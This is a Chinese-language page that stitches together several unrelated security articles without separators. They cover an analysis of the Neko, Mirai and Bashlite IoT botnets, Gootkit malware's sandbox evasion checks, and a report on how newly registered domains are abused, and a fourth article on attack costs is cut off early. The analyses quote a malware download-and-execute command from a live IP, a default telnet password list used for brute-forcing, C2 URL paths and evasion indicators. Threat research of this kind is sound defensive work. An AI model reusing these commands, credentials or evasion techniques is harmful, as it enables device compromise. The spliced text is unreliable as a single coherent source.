近期发现了3款恶意软件变种——Neko,Mirai和Bashlite。在2019年7月22日,我们发现了Neko僵尸网络的恶意软件样本,并马上开始对其进行分析,接下来我们又发现了另外一个样本,相比之前增加了额外的漏洞利用方法。7月30日,又出现了一个名为“Asher”的Mirai变种,而在这之后,又发现了一个名为“Ayedz”的Bashlite变种。列出的这些恶意软件变种可以将路由器感染为僵尸网络中的设备,能够发起分布式拒绝服务(DDoS)攻击。

Neko

7月22日,我们的蜜罐检测到一个僵尸网络的恶意软件样本,x86.neko(被Trend Micro检测为Backdoor.Linux.NEKO.AB),该样本具有弱口令爆破的功能,之后会执行以下命令:

“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”

我们的研究表明这个僵尸网络恶意软件在多种处理器架构下都有相应版本存在。根据分析,我们发现Neko僵尸网络能够执行多条后门指令:既能执行shell命令,又能发起UDP和UPD-HEX泛洪攻击,从而致瘫路由器正常处理和响应信息的能力。Neko还有结束进程(程序中的“killer”功能)的功能。同时其内部还存有一个可扩展的“死亡名单”——包含其他恶意软件相关的进程列表,如有存在即会结束相关进程。对Neko僵尸网络更深入的代码分析显示它还带有一个能够查找多种漏洞利用方式的扫描器,从而使其能够传染到其他有漏洞的设备中。

1、Eir WAN端远程命令注入(TR-064)——Eir D1000路由器的一个广域网(WAN)端RCE漏洞

2、HNAP SOAPAction-Header 命令执行(CVE-2015-2051)——由错误处理恶意HTTP请求造成的多个D-Link路由器的RCE漏洞

3、华为路由器HFG532——任意命令执行(CVE-2017-17215)——由验证某个配置文件不当造成的华为HG532上的RCE漏洞

4、GPON路由器——认证绕过/命令注入(CVE-2018-10561,CVE-2018-10562)——由认证绕过和命令注入造成的DASAN GPON家用路由器的RCE漏洞

5、Linksys E系列——远程代码执行——由未经身份认证和操作系统命令注入造成的RCE漏洞

6、MVPower Shell命令执行——利用了MVPower数字视频录像机(DVRs)中未经身份认证的RCE漏洞

7、ThinkPHP 5.0.23/5.1.31 RCE ——开源web开发框架ThinkPHP 5.0.23/5.1.31的RCE漏洞

8、Realtek SDK – Miniigd UPnP SOAP 命令执行(CVE-2014-8361)——使用了Realtek SDK中的miniigd程序的设备,由未经身份认证和操作系统命令注入造成RCE漏洞

除了以上的漏洞利用,我们还发现Neko僵尸网络同时扫描了有漏洞的Africo设备。我们还无法确定Neko为了扫描哪款Africo设备,同时我们注意到这一扫描和任何一个漏洞利用都没有什么联系。但是,我们发现这一漏洞的结构和网件DGN1000/DGN2200等DGN设备的未认证RCE漏洞有相似之处。

africo-copy.png图1 Neko僵尸网络恶意软件代码显示其是如何扫描Africo设备的

7月29日,蜜罐收集到了一个升级的Neko僵尸网络恶意软件样本(检测为Backdoor.Linux.NEKO.AC)。这一次,文件使用了UPX进行加壳保护,并把UPX的特征魔数(UPX!)进行了修改,从而防止被脱壳。

fig-2.png图2 UPX加壳并修改了UPX特征魔数的Neko僵尸网络恶意软件代码

我们发现这个新的样本的扫描功能更加强大了,并且使用了更多的漏洞利用方式进行感染传播。有趣的是,其漏洞利用列表现已加入网件DGN1000/DGN2200——而该漏洞结构和之前说的Africo扫描具有相似之处。Netgear.png

图3 Neko僵尸网络恶意软件代码显示其是如何扫描网件DGN1000/DGN2200的

新版本的Neko也对多种CCTV-DVR设备和网件R7000、R6400路由器(2016-6277)进行了扫描。

1.PNG图4和图5 Neko僵尸网络恶意软件代码显示其是如何扫描

多种CCTV-DVR设备和网件R7000、R6400路由器的

Neko变种对“awsec”也进行扫描,而这一漏洞结构和Vacron NVR RCE相似。

1.PNG图6 Neko僵尸网络恶意软件代码显示其是如何扫描“awsec”的

此外,该Neko变种还会尝试扫描“cisco”和“wap54g”。但是,根据分析,这两条命令都无法成功实现漏洞利用。“Cisco”尝试使用CVE-2018-15379——Cisco Prime Infrastructure中的HTTP web服务器存在目录权限配置不当的问题,从而导致RCE。但是该样本中的攻击载荷未使用正确的URL路径,因此漏洞利用没有成功。

1.PNG

图7 Neko僵尸网络恶意软件代码显示其是如何扫描“cisco”的

“wap54g”攻击载荷的HTTP头和消息体格式也出现了问题,可能导致了对Linksys WAP54Gv3远程调试Root Shell漏洞的利用失败。

1.PNG图8 Neko僵尸网络恶意软件代码显示其是如何扫描“wap54g”的

Mirai变种“Asher”

7月30日,发现了另一个路由器恶意软件——Mirai变种(被Trend Micro检测为Backdoor.Linux.MIRAI.VWIRC)。类似与Mirai,该变种会感染带有Busybox的设备,Busybox是一个为资源有限的设备提供的软件集。该变种会首先检查有无Busybox——执行“/bin/busybox {any string}”命令,如果设备系统给出响应“{any string} applet not found”,恶意软件就会继续它的操作。该变种的作者使用{any string}的部分来给恶意软件命名,在这个样本中,使用的是“Asher”。

1.PNG图9 检查BusyBox是否存在的命令截图

“Asher”变种能够通过爆破以下telnet登录口令的方式对路由器进行渗透:

12345
2011vsta
2601hx
4321
admin
daemon
default
guest
OxhlwSG8
pass
password
root
S2fGqNFs
support D13hh[
synnet
t0talc0ntr0l4!
[email protected]
tlJwpbo6
vizxv
xc3511

我们发现Asher通过扫描以下路由器漏洞进行利用和传播。可以看到它和Neko存在两个相似的漏洞利用:

1.PNG图10 Asher样本扫描的漏洞 

1、GPON路由器——认证绕过/命令注入(CVE-2018-10561,CVE-2018-10562)——由认证绕过和命令注入造成的DASAN GPON家用路由器的RCE漏洞

2、MVPower Shell命令执行——利用了MVPower DVR TV-7104HE 1.8.4 115215B9数字视频录像机中未经身份认证的RCE漏洞

3、Realtek SDK – Miniigd UPnP SOAP 命令执行(CVE-2014-8361)——使用了Realtek SDK中的miniigd程序的设备,由未经身份认证和操作系统命令注入造成RCE漏洞

1.PNGBashlite变种“Ayedz”

8月6日,检测到又一个路由器上的僵尸网络恶意软件样本,而这次是一个Bashlite的变种(被Trend Micro检测为Backdoor.Linux.BASHLITE.SMJC,Backdoor.Linux.BASHLITE.SMJC8,和Backdoor.Linux.BASHLITE.SMJC4),基于这个恶意软件的文件名,我们推测它为“Ayedz” 。执行时,Ayedz会通过46216端口发送有关感染设备的以下信息,给IP地址为167[.]71[.]7[.]231的主机:

1.PNG图14 Bashlite变种Ayedz用来回传信息所使用的命令

1、设备——如果“/usr/sbin/telnetd”文件存在,则其“getDevice”功能会返回一个“SSH”字符串,否则会返回一个“Uknown Device”字符串

2、文件——设备是否存在任何下列的文件:

/usr/bin/python

/usr/bin/python3

/usr/bin/perl

3、Linux发行版本——当感染设备的Linux版本时openSUSE,Red Hat Enterprise Linux(RHEL),CentOS,Gentoo Linux,Ubuntu,Debian, 或者未知

4、端口——如果找到了上述的4个文件,其“getPorz”功能返回会一个“22”字符串,否则返回“Uknown Device”字符串

对Ayedz样本的分析显示,它能够运行多个发起DDoS攻击的后门指令。我们也发现Ayedz提供了多个攻击/泛洪选项和其他命令,例如:

CLOUDFLARE – 绕过CloudFlare保护的HTTP泛洪
CNC – 设置C&C
HTTP – HTTP 泛洪
RAID – STD + TCP 泛洪
STD – STD 泛洪
STOMP – STD + UDP 泛洪
STOP – 停止僵尸行为
TCP – TCP SYN 泛洪
UDP – UDP 泛洪
UPDATE –从C&C进行更新

解决方案

保护路由器免受类似Neko,Mirai和Bashlite等恶意软件的威胁

尽管厂商在保护路由器和其他设备的安全性上扮演着很重要的角色,用户和商业用户也需采用良好的安全习惯来抵御类似Neko,Mirai和Bashlite等恶意软件:

1、选择一个会持续给产品打补丁的值得信赖的厂商

2、经常升级设备(如路由器)固件和软件,经常更换用来登录这些设备的口令

3、使用加密,确保设备连接安全

4、配置路由器,使其更好抵御攻击行为

5、禁用设备中过期或不必要的组件,仅使用来自可信源的合法应用

6、在家庭网络和接入的设备中部署提供额外安全保护的工具

*参考来源:trendmicro,由Kriston编译,转载请注明来自FreeBuf.COM

timg.jpg

Gootkit恶意软件自2014年曝光之后,已经持续活跃5年。它利用Node.JS库执行一系列恶意任务,并且通过不断更新代码库多次升级和迭代,运用加密、混淆、反调试等手法对软件进行保护,增加其逆向过程中的复杂度,并且检测其运行环境,如果碰到可疑环境,沙箱检测则立即停止运行。凭借以上优势,其恶意代码也是在各大杀软平台查杀率最低的恶意软件之一,一度成为现今最活跃和复杂的木马之一。不过就目前而言,他的流行范围并不是很广,具有明显的定向攻击的特性。比如,从2019年3月末开始,就有研究人员发现许多针对意大利政府敏感单位的持续性钓鱼邮件攻击,并且在4月初达到高峰。经过研究人员的分析和取证,发现这些邮件包含了经过精心构造的诱饵内容,通过诱骗用户点击附件中的文档或程序进行激活,下载对应的后门程序。我们对相关的恶意代码进行分析后,发现其恶意代码种类多样,不仅包含exe可执行程序,还有vbs和js等脚本类语言编写的后门程序。在这些恶意代码中,研究人员发现了一直活跃在相关地区的Gootkit木马软件。其主要功能为窃取用户信息,下载文件,注入指定进程,实现可持续控制的后门。

这篇文章,我们将介绍Gootkit在攻击的第一阶段中所使用的反分析能力,其中包含解压缩阶段和恶意下载程序(用于设置受感染的系统),以及其他多种反分析机制。

解压缩阶段的反分析机制

样本MD5:0b50ae28e1c6945d23f59dd2e17b5632

对于这个样本,解压缩程序非常简单,因为它执行自注入。简单地说,解压缩人只需执行以下操作即可:分配内存区域 – >解密shellcode并复制到分配的区域 – >执行shellcode,解密第一阶段Gootkit可执行文件 – >覆盖未封装的解密可执行文件- >更改解密的可执行文件的保护并对它实施转移。

因此,为了对它进行解压缩,在VirtualAlloc和VirtualProtect上放置断点,并查看在分配的内存区域中出现的可执行标头。

1.jpg

解压缩样本的MD5:c342af62302936720e52679bc431d5a8

在IDA中打开样本后,你会立即注意到CreateThread API的使用,这在整个二进制文件中被过度使用,据推测,这可能是一种反动态分析方法。由于多个线程同时运行,因此调试程序变得非常困难。但是,可以通过每次只关注一个线程来避免这种情况。由于样本使用的混淆力度过大,静态分析方法并不是一种很好的选择。虽然明文中有相当多的字符串,但几乎所有使用的重要字符串都是在运行时使用简单但有效的XOR算法解密的。不仅字符串被加密,它们也被存储为堆栈字符串,使得提取重要数据变得更加复杂。

如上所述,加密算法其实相当简单,实际上就是2个不同的字符串在起作用。第一个字符串(通常更短)负责循环,使用第二个字符串的字节对每个字节进行异或处理。下面是Python中此算法的一个示例:

2.jpg

可以看出,上面的示例将返回字符串kernel32.dll。

在Gootkit开始执行其恶意例程之前,它首先检查传递给它的参数,就是这些参数决定了攻击发生的路径。 Gootkit接受的可能参数是:

--reinstall
--service
-test
--vwxyz

如果没有给出参数,Gootkit将执行一个设置例程,然后使用–vwxyz参数开始执行。–test参数只是导致进程退出,而–reinstall参数将使用我们将在下一篇文章中介绍的持久性方法重新安装Gootkit。最后,–service参数将只设置一个额外的环境变量,特别是变量名称USERNAME_REQUIRED,其值设置为TRUE。在这篇文章中,我们将主要关注恶意软件的安装阶段,以了解Gootkit在使用–vwxyz参数执行之前所采取的步骤。

反分析功能的介绍

如前所述,Gootkit包含大量反分析功能,可以避开沙箱检测,防止在虚拟机中执行,并降低分析速度。有趣的是,如果设置了特定的环境变量,则会跳过负责这些功能的函数。在运行时设置的变量名为crackmeololo,给它的值是navigator。在检查值时,Gootkit将使用CRC-32/JAMCRC哈希来检查有效性,而不是将其与字符串进行比较。如果CRC哈希不匹配,则系统检查开始。

3.jpg

Gootkit执行的第一项检查是文件名检查,简单地说,就是在二进制文件中有一个硬编码的CRC哈希文件名列表,它们与当前文件名的哈希值进行比较。如果找到匹配项,Gootkit将创建一个批处理文件,删除原始可执行文件,然后该进程将退出。 Gootkit搜索的文件名列表如下所示:

SAMPLE.EXE
MALWARE.EXE
BOT.EXE
SANDBOX.EXE
TEST.EXE
KLAVME.EXE
MYAPP.EXE
TESTAPP.EXE

5.jpg

下一次检查会立即在文件名检查后执行,此时Gootkit将创建另一个线程,它将使用OutputDebugStringA输出字符串“MP3 file corrupted”,然后再次检查环境变量crackmeololo。深入到代码中,研究人员发现如果在主机中有名为“crackmeololo”的环境变量,则该值将设置为“1”,否则设置为“0”。如果CRC哈希匹配,它将继续解密板载配置;如果没有,,它将对环境执行更深入的检查。

首先,它首先打开注册表项Hardware\DESCRIPTION\SystemDESCRIPTION\System\CentralProcessor\0,然后查询ProcessorNameString,将值与Xeon进行比较。 Xeon处理器主要用于服务器,而不是笔记本电脑或台式机。这是恶意软件在沙箱中运行的一个很好的指标,因此如果检测到它,Gootkit将进入无限的睡眠循环周期。

6.jpg

如果未检测到Xeon,将继续执行,然而,下一次检查更加密集。与文件名检查类似,Gootkit还包含用于检测沙箱或VM的MAC地址标识符的硬编码列表。加载RPCRT4.DLL后,它将调用UuidCreateSequential,然后使用MAC地址创建GUID。如果任何一个值匹配,它将再次进入无限的睡眠循环周期。以下就是硬编码的MAC地址列表以及相应的供应商:

7.jpg

8.jpg

接下来,Gootkit将调用GetModuleHandleA以尝试获取dbghelp.dll和sbiedll.dll的句柄,以尝试检测当前的调试器或沙箱Sandboxie。如果成功返回句柄,将会出现无限的睡眠周期。接着,Gootkit将通过调用GetUserNameA来检索当前用户名,并与CurrentUser和Sandbox进行比较。然后将检索计算机名称,并与SANDBOX和7SILVIA进行比较。你可能已经猜到,如果其中任何一个匹配,样本同样将进入无限的睡眠周期。

9.jpg

接着,Gootkit将查询HARDWARE\DESCRIPTION\System\SystemBiosVersion并将查询值与AMI, BOCHS, VBOX, QEMU, SMCI,  INTEL  – 6040000, FTNT-1和 SONI进行比较。你可能已经猜到,如果其中任何一个匹配,样本同样将进入无限的睡眠周期。

10.jpg

接着,Gootkit将执行另一个注册表查询,这次使用HARDWARE\Description\System\VideoBiosVersion,将值与VirtualBox进行比较。最后,Gootkit将查询SOFTWARE\Microsoft\Windows\CurrentVersion\SystemBiosVersion或HARDWARE\DESCRIPTION\System\SystemBiosVersion,以获取与Joe Sandbox和CWSandbox对应的3个值:

55274-640-2673064-23950: Joe Sandbox
76487-644-3177037-23510: CWSandbox
76487-337-8429955-22614: CWSandbox

如果所有检查都通过了,则Gootkit将通过设置持久性并从C2服务器检索有效载荷,继续执行攻击。不过在执行攻击之前,Gootkit将使用我们之前看到的相同CRC哈希再次检查其文件名。

在下一篇文章中,我们将研究Gootkit使用的持久性攻击方法,并查看–reinstall路径,以及用于检索最终阶段的通信例程的示例。

一、执行摘要

众所周知,新注册域名(NRD)一直以来都受到攻击者的青睐,被广泛使用于恶意攻击之中。根据学术界和行业的研究报告,已经以统计学方式证明了新注册域名确实存在风险,同时揭示了攻击者如何恶意使用新注册域名,具体包括网络钓鱼、恶意软件和诈骗。因此,最佳安全实践要求我们阻止并密切监测企业流量中的新注册域名。尽管有一些证据指向这个观点,但目前还没有研究人员针对真实样本中新注册域名的恶意使用方式和威胁进行全面的研究。为此,本篇文章将针对恶意攻击者滥用新注册域名的案例进行研究与分析。

超过9年时间里,我们一直对新注册域名进行跟踪。我们与互联网名称与数字地址分配机构(ICANN)以及各种域名注册机构和注册商保持合作,从而使得我们可以直接掌握在通用顶级域名(gTLDs)和国家和地区代码顶级域名(ccTLD)下的许多新注册域名。我们还通过利用数据源的组合间接识别新注册域名,这些数据源包括WHOIS、区域文件和被动式DNS。我们独有的新注册域名资源由1530个顶级域名组成,据我们目前所了解,这是当前市场上最高质量的公开提供新注册域名服务。

根据我们的分析,有超过70%的新注册域名都是恶意的、可疑的或不安全的。这个概率要比在Alexa TOP 10000域名中观察到的数量高出10倍。此外,大多数恶意用途的新注册域名都是非常短暂的,它们只存在几个小时或者几天,有时甚至只存在于没有任何安全厂商检测到恶意域名的期间内。正因如此,在企业的预防性安全措施中才应该考虑如何阻止新注册域名。

在本文中,我们提供了一些关于近期新注册域名的高级统计数据,并根据对样本进行研究,证明了与之相关的滥用情况和威胁,最后讨论了最佳实践的方式。

二、高级统计结果

2.1 统计

我们的系统平均每天识别大约200000个新注册域名,总量在150000到300000之间波动。下图展示了2019年3月10日至5月29日期间的新注册域名数量。通常情况下,工作日的新注册域名数量一直大于周末的新注册域名,峰值通常出现在周三,谷值通常出现在周日。

每日新注册域名统计:

1.png

2.2 按顶级域统计分布

并非每个顶级域(TLD)每天都有新注册域名。平均而言,每天全部新注册域名共涉及到600-700个顶级域。下图列出了注册数量最多的前10个顶级域。该分布图基于2019年3月到5月之间的数据集取平均值。可以看出,尽管.com顶级域是在34年前(1985年3月15日)推出的,但它仍然是最受欢迎的顶级域,占最近所有新注册域名的33%之多。

第二名会随着时间而有所变化,但大多数情况下都会是在比较小众的ccTLD之中,例如.tk、.cn、.uk。举例来说,在2018年11月到12月期间,.cn一直保持在第二位。但在2019年3月到5月期间,.tk一直排在第二位。其中有一些ccTLD之所以包含大量新注册域名,是因为它们提供了免费域名注册(例如:.tk、.ml、.ga、.cf和.gq)。

新注册域名的使用情况:

2.png

为了弄清楚这些新注册域名的用途,我们会根据PAN-DB URL过滤服务的分类对这些域名进行交叉检查。该服务借助一系列技术对URL进行分类,所使用的技术包括Web内容爬虫、恶意软件流量分析、被动式DNS数据分析、机器学习和深度学习。为简单起见,我们共将域名分成五个类别,分别是:恶意、可疑、不安全、良性和其他。针对其中的恶意URL,我们再细分成三类,分别是:恶意软件、命令和控制(C2)和网络钓鱼。针对其中的可疑URL,我们将其分为:停靠、可疑、不充分的内容和高风险这四类。针对其中的不安全URL,我们将其细分为裸露、成人内容、赌博、不安全的活动这四类。针对其中的良性网址,我们将其细分为商业与经济、计算机与互联网信息、购物这三类。对于任何不适用上述分类的URL,我们都将其统一归为其他类。上图右侧展示了这五个大类的细分。

有超过70个新注册域名都被我们的PAN-DB URL过滤服务标记为恶意、可疑或不安全。这一概率是Alexa TOP 10000域名中概率的10倍,仅仅占了7.6%。此外,在我们的PAN-DB URL过滤服务中,恶意分类仅占新注册域名的1.27%。然而,在Alexa TOP 10000域名中,这个比例仅仅是0.07%左右。

2.3 恶意新注册域名

为了进一步了解恶意新注册域名的特征,我们确认并计算了每个顶级域中新注册域名的概率。下图列出了近期新注册域名中恶意域名概率最高的前15个顶级域。其中有多数是国家和地区顶级域名(ccTLD)。针对具体的顶级域名,如果具有较高的恶意域名率,其中的一些原因可能是注册域名价格较低、提供免费注册服务、注册方式不严格、不公开显示WHOIS注册者信息等。

近期新注册域名中恶意域名概率最高的前15个顶级域:

3.png

三、恶意滥用及威胁

接下来,我们讨论新注册域名的恶意滥用。我们对借助URL过滤工具、WildFire、DNS安全这些产品和服务所观察到的新注册域名进行了分析,发现新注册域名往往与恶意滥用和威胁相关联,其中包括C2、恶意软件分发、网络钓鱼、域名仿冒、潜在有害程序/广告邮件和垃圾邮件。我们对其中每个分类进行了重点分析,并列举出了一些现实中的实际样本。

3.1 C2域名

对于恶意软件来说,通常要打电话回老巢,以此来获取命令,下载更多Payload或实现数据窃取。用于上述目的的恶意域名被称为命令和控制(C2)域名。

域名soroog[.]xyz在2019年5月29日首次注册,我们在注册的当天就观察到存在使用该域名作为C2的恶意软件。到目前为止,我们已经发现有7个AzoRult恶意软件样本使用该C2域名。属于此系列的恶意软件能够自动收集敏感数据,例如比特币钱包和信用卡信息。

下图中,展现了我们捕获的一部分恶意流量,其中发现它正在与C2 soroog[.]xyz进行通信。该域名最初被托管在IP地址51.68.184[.]115。根据我们的被动式DNS记录,该域名解析的IP地址在2019年6月24日之后切换为51.38.101[.]194。而在2019年6月26日之后,该域名变为NXDomain(不存在的域名)。正如我们所看到,这个域名的生存周期非常短暂。实际上,大多数用于恶意目的的新注册域名都是如此,它们仅仅存活了几个小时或者几天,有时甚至只存在于没有任何安全厂商检测到恶意域名的期间内。正因如此,在企业的预防性安全措施中才应该考虑如何阻止新注册域名。

AzoRult C2流量的数据包捕获:

4.png

下面进一步列举了该域名下的C2 URL及其用法,如果想要深入了解该恶意软件的行为,可以参考我们公开的两份分析报告。

URL及对应的用法:

soroog[.]xyz/addbot 注册一个新的僵尸主机

soroog[.]xyz/wallets 发送被窃取的(加密货币钱包)信息

soroog[.]xyz/suicide 报告自我删除

soroog[.]xyz/task 注册新的任务

soroog[.]xyz/cpu 发送新的CPU信息

3.2 恶意软件分发

新注册域名通常被用于恶意软件分发。在这里,我们以Emotet恶意软件系列为例。Emotet是一种银行木马,可以嗅探网络流量以获取银行凭据。尽管该木马早在2014年就已经被发现,但它在今天仍热广泛流行。到目前为止,我们在2019年已经观察到了50000个独特的样本。最初的投放是通过网络钓鱼攻击来完成的。如下图所示,恶意DOC通常在网络钓鱼电子邮件中出现,以邮件附件的方式存在。这个DOC文档通常用作下载程序,将会下载并执行下一步骤的Payload。下载过程通常是通过HTTP协议进行的,我们观察了数千个下载URL,其中有许多都是在新注册域名上托管的。

Emotet恶意软件分发链:

5.png

举例来说,域名hvkbvmichelfd[.]info是在2019年5月2日注册的。但仅在4天之后,5月6日,我们就看到Emotet DOC使用URL hxxp://hvkbvmichelfd[.]info/skoex/po2.php?l=spond1.fgs来下载更多Payload。值得关注的是,Payload进一步联系了另一个新注册域名,halanis21yi84alycia[.]top,以下载第二阶段的Payload(上图未标明)。第二个域名也是在2019年5月2日注册。

如果想要了解有关Emotet的更多信息,可以参考我们的两篇公开文章。

3.3 网络钓鱼

网络钓鱼活动通常也会使用新注册域名。域名canada-neflxt[.]com是在2019年7月4日注册的。根据我们的被动式DNS记录,我们在2019年7月6日起看到该目标的流量,发现它直到7月17日才成为一个活跃的网络钓鱼站点。该过程中,会试图窃取受害者的Netflix凭证以及账单信息。此外,还有另一个域名netflix-mail[.]ca也可以重定向到canada-neflxt[.]com,前者域名已经在7月11日注册。

该网络钓鱼网站采用了多种技术,以便将其隐藏在自动检测方法之外。例如,登录页面canada-neflxt[.]com/login(如下图所示)利用验证码来防止爬虫爬取太多内容。此外,在登录页面上仅用了右键单击,我们认为这可以防止受害者更轻松地检查网站的页面资源和网络流量。在输入用户名和密码后,我们发现会发出一个未经加密的信息。接下来,受害者将可以访问用于设置账单信息的界面。

登录界面与Captcha:

屏幕快照 2019-08-22 00.45.17.png

登录界面带有登录表单,并且右键单击被禁用:

7.png

结算页面并收集结算信息:

8.png

3.4 域名仿冒

近似域名抢注是域名抢注的一种细分形式,主要利用互联网用户在网络浏览器中输入域名时所可能产生的拼写错误。在实现域名仿冒后,大致有三种主要收益方式。

第一种,可以等待以高价出售给目标域名的所有者(例如:facebo0k[.]com仿冒了facebook[.]com)。然而,根据我们的分析,大型企业在防御域名抢注(域名仿冒)方面都做得普遍较好。此外,还有许多品牌监控和保护服务,可以帮助进行防御性注册。因此,如果攻击者以这种方式获得收益,他们的赚钱方式会变得越来越困难。

第二种,是投放广告,或将流量重定向到广告或仿冒域名所对应真实域名的竞争对手(例如:t-mogbile[.]com会重定向到verizonwireless[.]com)。在这里,一个关键思路就是如何将想法通过流量的方式变现。如果流量足够大,实际上可以赚取到比注册费(通常每年不到10美元)更多的收入,这样做从经济角度来看是合适的。

第三种,是提供恶意内容,例如仿冒原始网页的页面,暗中下载恶意软件等。

在新注册域名中,我们观察到存在大量的域名仿冒情况。例如,域名mocrosoft[.]cf可能是针对Microsoft的仿冒域名。之所以选择这个仿冒名称,是因为字母“i”和“o”在经典键盘上彼此相连,打错的可能性比较高。该域名在2019年6月3日首次注册,在注册当日就发现存在访问记录。下图是使用Microsoft Edge浏览器访问该网页的屏幕截图。显然,这是一个试图窃取用户登录凭据的仿冒页面。

带有伪造用户登录表单的网络钓鱼页面:

9.png

3.5 域名生成算法DGA

域名生成算法(Domain Generation Algorithm,DGA)是恶意软件用于定期生成大量域名的常用方法,这些域名可以用于C2或窃取数据等恶意目的。大多数DGA根据时间和日期来生成域名。例如,Conficker C每天生成50000个域名。庞大的域名规模使得执法部门很难对其进行彻底关停。但是,攻击者掌握算法,因此可以预测在特定日期将会生成哪些域名。因此,攻击者只需要根据实际需求,在特定日期注册一个或多个域名即可实现攻击。绝大多数DGA域名看起来都非常随机。

例如,ypwosgnjytynbqin[.]com是属于Ramnit系列恶意软件的DGA域名,在2019年7月3日注册。在3天过后的7月6日,我们观察到一个与该域名进行通信的Ramnit样本(SHA-256:136896c4b996e0187fb3e03e13c9cf7c03d45bbdc0a0e13e9b53c518ec4517c)。

下表列举了其它一些示例,其中恶意软件在注册后不久就与DGA域名进行通信。

使用域名生成算法的新注册域名与关联的恶意软件列表:

C2域名:eqbqcguiwcymao[.]info

注册日期:2019-01-17

恶意软件SHA-256:6e812122f3067348580f06a1c62068cf7d3bf05a86e129396d51dd7666bcf7b9

恶意软件首次发现日期:2019-01-21

恶意软件家族:Pykspa

C2域名:aaqkekyaum[.]org

注册日期:2019-04-13

恶意软件SHA-256:418dd3d94d138701f06c58ffb189dfae08c778fb9ad3859dbb7a301f299a8e55

恶意软件首次发现日期:2019-04-13

恶意软件家族:Pykspa

C2域名:qgasocuiwcymao[.]info

注册日期:2019-06-12

恶意软件SHA-256:72748e6e2a3260e684f295eafcb8dd5b9927d15c41857435dfa28fd473eeccc4

恶意软件首次发现日期:2019-06-13

恶意软件家族:Pykspa

C2域名:litvxvkucxqnaammvef[.]com

注册日期:2019-04-11

恶意软件SHA-256:de51942e72483067aaeae3810bc4a24b8e12a782b3a59385989f9fccba08e421

恶意软件首次发现日期:2019-04-13

恶意软件家族:Ramnit

3.6 潜在有害程序/广告软件

PUP代表“潜在有害程序”,在大多数情况下都是广告软件。广告软件可能不会像恶意软件那样真正损害系统。但是,它通常会对系统进行不必要的更改,例如更改浏览器的默认页面、劫持浏览器并插入广告等。有时,潜在有害程序/广告软件的基础架构可以被攻击活动中的恶意软件重新使用,从而对存在潜在有害程序的主机造成风险。

installsvpn[.]com就正是为潜在有害程序分发而创建的,该域名首次注册于2019年5月10日,我们在5月16日就开始监测到这个域名是用于域名生成算法。特别是,这是一个针对iPhone用户的广告软件。下图弹出的是虚假的病毒提示信息,试图引导用户下载并安装“Secret VPN”工具。为了绕过检测,网站上仅检索操作系统信息,并将仅显示针对iPhone的警告。针对其他系统,将直接返回空页面。

伪造病毒警告弹出窗口:

10.png

另一个例子是llzvrjx[.]site域名,该域名在2019年6月12日注册,并在6月14日开始运行。这是一个成人网站,提供免费的流媒体视频应用程序,我们分析了这个应用的Android版本,发现该应用程序默认附带了值得警惕的权限,例如:ACCESS_FINE_LOCATION、SEND_SMS和READ_CONTACTS。该网页还针对移动用户做了适配和定制。其中包含一个隐藏的JavaScript,可以通过检查浏览器的用户代理来隐藏桌面用户或爬虫。

3.7 诈骗

除了主要尝试获取用户凭证(例如用户名和密码)的网络钓鱼诈骗之外,还有其他类型的在线诈骗。根据我们的分析,这些骗局也依赖于新注册域名,下面是一些案例。

(1)奖励诈骗:域名mey12d4[.]xyz在2019年5月13日注册。同一天,我们观察到一个恶意活动将该域名嵌入到发送给受害者的未经请求的短信中,如下方左图所示。在短信中,攻击者使用“100美元奖励”诱导用户点击链接。一旦用户点击链接,在浏览器中打开网页,将会经历一系列重定向,最终访问了虚假的Amazon调查页面,如下方右图所示。我们点击了“调查”,并进入到了一个页面,其中要求提供信用卡和家庭住址这类个人信息。

11.png

(2)技术支持团队:这种类型的诈骗要依赖于社会工程学,攻击者通过电话声称提供合法的技术支持服务。受害者经常以“安装远程桌面访问工具”和“通过提供信用卡信息来支付支持费用”的名义被欺骗。诈骗过程通常会从一个网站开始,恶意人员会虚构计算机存在漏洞(受到损坏),并指示受害者拨打技术支持号码。下图展现了一个实际案例,该页面托管在域名system-alert-m99[.]xyz。在同一天,它开始服务于技术支持诈骗界面。

12.png

(3)重新支付诈骗:近期,Unit 42团队的成员在文章中提到了“重新支付”的诈骗方式。基本上来说,受害者都会被诱骗少量的钱来试用减肥药产品。然而,有一个小小的细则表明,“如果你在特定时间内没有取消订阅,那么你将被定期收取更高的金额”。其中具体给出的支付金额非常惊人,可以是50美元到100美元之间。此类诈骗中使用的大多数域名都是新注册域名,例如ketoweightlosspillsreviews[.]com就是在最近的6月1日注册的。有关此诈骗方法的其他信息,可以参阅博客文章。

3.8 垃圾邮件

垃圾邮件通常是指未经请求的邮件,攻击者首先会以不同方式收集批量的电子邮箱地址,随后再发出邮件。垃圾邮件的目的各不相同,从恶意软件到鱼叉式网络钓鱼。下图展现了一个垃圾邮件,主要是用于扩散有关退休储蓄的广告。该邮件是由2019年7月15日收到的。但不出所料的是,Google在收到时就将其检测为垃圾邮件。

新注册域名发出的垃圾邮件:

13.png

四、总结

总而言之,新注册域名(NRD)经常会被恶意行为者滥用,以开展恶意目的,其中包括但不限于C2、恶意软件分发、网络钓鱼、域名抢注、潜在有害程序/广告软件和垃圾邮件。同时,也有很多良性用途,比如推出新产品、创建新品牌或活动、举办新会议或建立新的个人网站。

在Palo Alto Networks,我们建议使用URL过滤的方式阻止对新注册域名的访问。尽管这一措施存在潜在的误报风险,可能会被一些人认为比较激进,但实际上新注册域名遭遇的风险要大得多。至少来说,如果允许访问新注册域名,应该设置警报来提高可见性。我们将新注册域名定义为在过去32天内注册或变更所有权的任何域名。通过分析表明,32天是有助于新注册域名被反病毒软件检测为恶意的最佳时间范围。

正如本文的顶级域名(TLD)部分所示,我们甚至阻止主要由攻击者使用的顶级域名。当然,每个组织在阻止全部顶级域名时,必须要了解他们对潜在误报的容忍度。

客户可以通过URL过滤、DNS安全、WildFire和威胁防护来实现保护,也可以找到本文中所提到的恶意指标并进行自动分析。

网络攻击在不同领域会导致额外成本的增加,除了经济成本的增加,比如影响生产或者是网络安全防御投入,还有一些看不见的成本,比如客户信任和公司荣誉。

网络攻击产生的所有成本是难以精确计算的,且不同行业成本亦大不相同。因而,有些机构对医疗、零售、制造业、金融四个行业的经济成本作了研究。

timg.jpg

一、医疗健康

医疗行业极其容易受到黑客的攻击。黑客知道,医疗设施通常记录了大量的具有特殊需求的信息,这些信息在黑市上的价值是信用卡的十倍。Carbon Black的一份报告显示,三分之二的受访者表示和去年相比,网络攻击已经变得更加复杂多样,难以捉摸。

